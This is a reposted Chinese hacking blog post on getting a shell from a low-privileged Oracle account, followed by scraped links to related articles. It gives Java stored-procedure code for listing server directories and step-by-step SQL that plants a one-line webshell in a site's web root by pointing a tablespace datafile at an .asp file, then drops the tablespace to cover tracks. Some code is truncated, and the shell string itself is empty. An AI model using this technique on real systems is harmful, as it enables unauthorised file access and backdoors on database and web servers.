oracle 最小权限,oracle低权限下获取shell

转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》

经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code:

create global temporary table BLUEUSER.dirlist(

filename varchar2(255),

filesize number,

filedate date)

on commit delete rows;

create or replace and compile java source named DirList as

import java.io.*;

import java.sql.*;

public class DirList

{

public static void getList(String directory) throws SQLException

{

File path=new File(directory);

String[] fileList=path.list();

String fileName;

long fileSize;

long fileDate;

for (int i=0;i

{

fileName=fileList[i];

File fpath=new File(directory+’/'+fileName);

fileSize=fpath.length();

fileDate=fpath.lastModified();

#sql{insert into BLUEUSER.dirlist(filename, filesize, filedate)

values(:fileName,:fileSize,to_date(‘01/01/1970′,’mm/dd/yyyy’)+:fileDate/(24*60*60*1000))};

}

CREATE OR REPLACE PROCEDURE BLUEUSER.p_get_dir_list(i_directory IN VARCHAR2) AS

LANGUAGE JAVA NAME ‘DirList.getList(java.lang.String)’;

SQL> exec BLUEUSER.p_get_dir_list(‘/tmp’);

PL/SQL procedure successfully completed

select * from BLUEUSER.dirlist;

select * from BLUEUSER.dirlist where rownum<150;

select filename from BLUEUSER.dirlist where rownum<150;

select filename from BLUEUSER.dirlist;

truncate table BLUEUSER.dirlist; 好啊要不然是追加.

测试环境:oracle 9+redhat

——————ORACLE 建立数据文件WriteWebShell———————

SQLJ 存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？

那也可以使用以下我说的这个方式

SQL> create tablespace kjtest datafile ‘e:\website\kj.asp’ size 100k nologging ;

表空间已创建。

这里记住了 100K为ORACLE 表空间最小的单位，如果你的一句话SHELL比较大那可以200K比较稳妥

但是最终建议一句话一定要最最简洁

SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest;

表已创建。

一般用 VARCHAR类型已经可以，表空间太小了，所以不可以为 CLOB或者 BLOB类型。

SQL> insert into WEBSHELL values(‘’);

已创建 1 行。

SQL> commit;

提交完成。

提交完成之后就 OK？ NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间

SQL> alter tablespace kjtest offline;

表空间已更改。

到这里你的一句话SHELL代码已经写到那个文件了

你会发现有这样的的代码

一句话shell已经OK了

最后使用后记得吧表空间删除

SQL> drop tablespace kjtest including contents;

表空间已删除。

oracle 最小权限,oracle低权限下获取shell相关推荐

oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic <关于oracle列目录的可行性测试> 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj ...
linux得到低权shell,oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic <关于oracle列目录的可行性测试> 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj ...
oracle用户获取datameta权限,Oracle数据库提权(低权限提升至dba)
0x01 Oracle存储过程"缺陷" 在 Oracle 的存储过程中,有一个有趣的特点:运行权限.运行权限分为两种,definer 和 invoker. definer 为函数创 ...
安卓获取imei权限闪退_Android10 下获取序列号和IMEI号的权限
介绍 Android10 因为提高了其安全性能,因此获取序列号和IMEI号的权限与以前的版本有了变化这里就举例Zebra 移动设备Android 10 系统下的如何获取相应权限.运行Android 1 ...
oracle 最小权限,基础知识6——安全和最小权限原则
数据库安全和最小权限原则用户只拥有执行其任务所需的最小权限,并禁止所有未被允许的权限. 默认下SYS和SYSTEM拥有所有权限. 除了使用口令配置文件外,还需要遵循一些最佳实践,特别熟授予publi ...
oracle数据库有哪些权限,ORACLE数据库中权限有哪些？
1 权限 Oracle数据库有两种途径获得权限,它们分别为: ① DBA直接向用户授予权限. ② DBA将权限授予角色(一个命名的包含多个权限的集合),然后再将角色授予一个或多个用户. 使用角色能够更 ...
oracle 授权增删改查权限_linux suid,sgid,sticky-bit三种特殊权限简介
三种特殊权限简介 SUID 当一个设置了SUID 位的可执行文件被执行时,该文件将以所有者的身份运行,也就是说无论谁来执行这个文件,他都有文件所有者的特权. 如果所有者是 root 的话,那么执行人就 ...
Oracle 用户、对象权限、系统权限
一.用户与模式用户:对数据库的访问,需要以适当用户身份通过验证,并具有相关权限来完成一系列动作SYS用户,缺省始终创建,且未被锁定,拥有数据字典及其关联的所有对象SYSTEM用户,缺省始终创建,且未 ...
oracle 授权传递,Oracle基础学习4--Oracle权限传递
下面将用一个实例来讲解: 首先用oracle系统用户(sysdba身份)连接到Oracle 然后创建两个用户"lisi"和"zhangsan" 然后为lisi授 ...

oracle 最小权限,oracle低权限下获取shell

oracle 最小权限,oracle低权限下获取shell相关推荐

最新文章

热门文章